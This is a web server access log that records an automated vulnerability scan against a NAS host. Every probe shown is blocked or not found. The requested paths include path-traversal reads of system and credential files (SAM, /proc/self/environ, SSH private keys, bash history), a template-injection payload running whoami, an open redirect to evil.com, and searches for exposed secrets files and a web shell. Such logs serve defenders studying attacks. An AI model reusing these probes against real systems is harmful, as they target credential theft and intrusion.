[Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - - 403 - GET https nas.profibot.hu "/?doc=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/Makefile" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/ens/domain_map.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/linkerd2/values.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/r57.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/admin/reports/status" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/helm/releases.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/tsconfig.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/stats/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/uplink/scripts/tx_settings.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:29 +0000] - 404 404 - GET https nas.profibot.hu "/env.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - - 403 - GET https nas.profibot.hu "/?view=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/backup.tar.zip" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/stripe-credentials.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/etc/opendkim.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/main.tf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - - 403 - GET https nas.profibot.hu "/?include=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/kafka/server.properties" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/refunds/refund_policy.pdf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 403 403 - GET https nas.profibot.hu "/.env.bak.save" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/index.php/updater" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/manual/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/cdn/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/ws-admin/command?run=DELETE%20/admin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/inventory/setup.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/modules/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/telco/core-network/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - - 403 - GET https nas.profibot.hu "/?inc=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/torch_config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/actuator/env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/smtp2go/env.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/model/serve_config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/admin/content" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:30 +0000] - 404 404 - GET https nas.profibot.hu "/staff/10/salary" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/phpinfo.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/backup.tar.gz" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 403 403 - GET https nas.profibot.hu "/.babelrc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 403 403 - GET https nas.profibot.hu "/.config/gcloud/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/soap/server.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 403 403 - GET https nas.profibot.hu "/scripts/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/////////////etc/php.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/config/config.local.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/iot/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/googlepay/gateway_keys.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - - 403 - GET https nas.profibot.hu "/?template_file=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/ngo/payout_rules.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/tpl?body={%%20print(%27whoami%27)%20%}" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/go.sum" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/dir-prop-base" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/etc/php.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/middleware.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/index.php/install" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/socket/debug" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/auth/validate?header=none" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 403 403 - GET https nas.profibot.hu "/oauth/.well-known/openid-configuration" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/internal/status" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/transformers/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:31 +0000] - 404 404 - GET https nas.profibot.hu "/lip-sync/params.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/images/models/face_model.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - - 403 - GET https nas.profibot.hu "/?template_file=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/////////////var/log/apache2/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/crypto_signers/curve25519.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 403 403 - GET https nas.profibot.hu "/~/.notmuch-config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/status/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/rpc/nodes.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/config/mail.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/processor/api_keys.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/wp-mail.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - - 403 - GET https nas.profibot.hu "/?template_file=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - - 403 - GET https nas.profibot.hu "/auth/oauth2/login?redirect_uri=http://evil.com/callback" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/etc/mosquitto/mosquitto.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/config/settings.inc.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/themes/index.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/adas/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/config/services.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/admin/webhook?url=..." [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/etc/courier/imapd" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - - 403 - GET https nas.profibot.hu "/?read=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/db.old" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/model" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/shopify.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:32 +0000] - 404 404 - GET https nas.profibot.hu "/storefront/api/config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/apidoc/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/kubectl-config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/v2/api-docs" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/internal/dashboard" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/test/payment_gateway/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/app-debug.apk" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/Pipfile.lock" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/wp-json/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/test/undefined" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/subscriptions/plan_config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/mail/queue.db" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/src/config/binance.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/startup" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 403 403 - GET https nas.profibot.hu "/.user.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/icons/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/nats/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/device/code" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/grafana/agent.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/update.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/ansible.cfg" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - - 403 - GET https nas.profibot.hu "/?template_file=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/etc/iredmail/functions/roundcube.sh" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:33 +0000] - 404 404 - GET https nas.profibot.hu "/backend" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 404 404 - GET https nas.profibot.hu "/auth.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 404 404 - GET https nas.profibot.hu "/dapp/src/hooks/useWallet.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 404 404 - GET https nas.profibot.hu "/fx/settings/conversion_rates.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 403 403 - GET https nas.profibot.hu "/.env.aws" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 403 403 - GET https nas.profibot.hu "/.cshrc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 404 404 - GET https nas.profibot.hu "/api/v1/users/2/permissions" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 403 403 - GET https nas.profibot.hu "/.bash_aliases" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 404 404 - GET https nas.profibot.hu "/metrics/health" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 404 404 - GET https nas.profibot.hu "/etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - - 403 - GET https nas.profibot.hu "/?view=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 404 404 - GET https nas.profibot.hu "/rtu/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 404 404 - GET https nas.profibot.hu "/debug.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 404 404 - GET https nas.profibot.hu "/plesk-stat/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 404 404 - GET https nas.profibot.hu "/server/config/env.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 404 404 - GET https nas.profibot.hu "/windows/win.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - - 403 - GET https nas.profibot.hu "/?file=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 404 404 - GET https nas.profibot.hu "/default.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 404 404 - GET https nas.profibot.hu "/crossborder/fx_engine_config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 404 404 - GET https nas.profibot.hu "/analytics.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - - 403 - GET https nas.profibot.hu "/?data=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 404 404 - GET https nas.profibot.hu "/model/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 404 404 - GET https nas.profibot.hu "/buildkite/pipeline.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:34 +0000] - 404 404 - GET https nas.profibot.hu "/checkov.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 404 404 - GET https nas.profibot.hu "/opt/mailcow/data/conf/postfix/main.cf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 404 404 - GET https nas.profibot.hu "/internal/test" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 404 404 - GET https nas.profibot.hu "/project/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 404 404 - GET https nas.profibot.hu "/smart-contracts/truffle-config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 404 404 - GET https nas.profibot.hu "/usr/share/mailx/mailx.rc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 404 404 - GET https nas.profibot.hu "/bridge/ws2http" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 404 404 - GET https nas.profibot.hu "/application.properties" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - - 403 - GET https nas.profibot.hu "/?config=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 404 404 - GET https nas.profibot.hu "/index.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 404 404 - GET https nas.profibot.hu "/banking/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/LOCK" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 404 404 - GET https nas.profibot.hu "/retry/payment_attempts.db" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 404 404 - GET https nas.profibot.hu "/:9000" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" 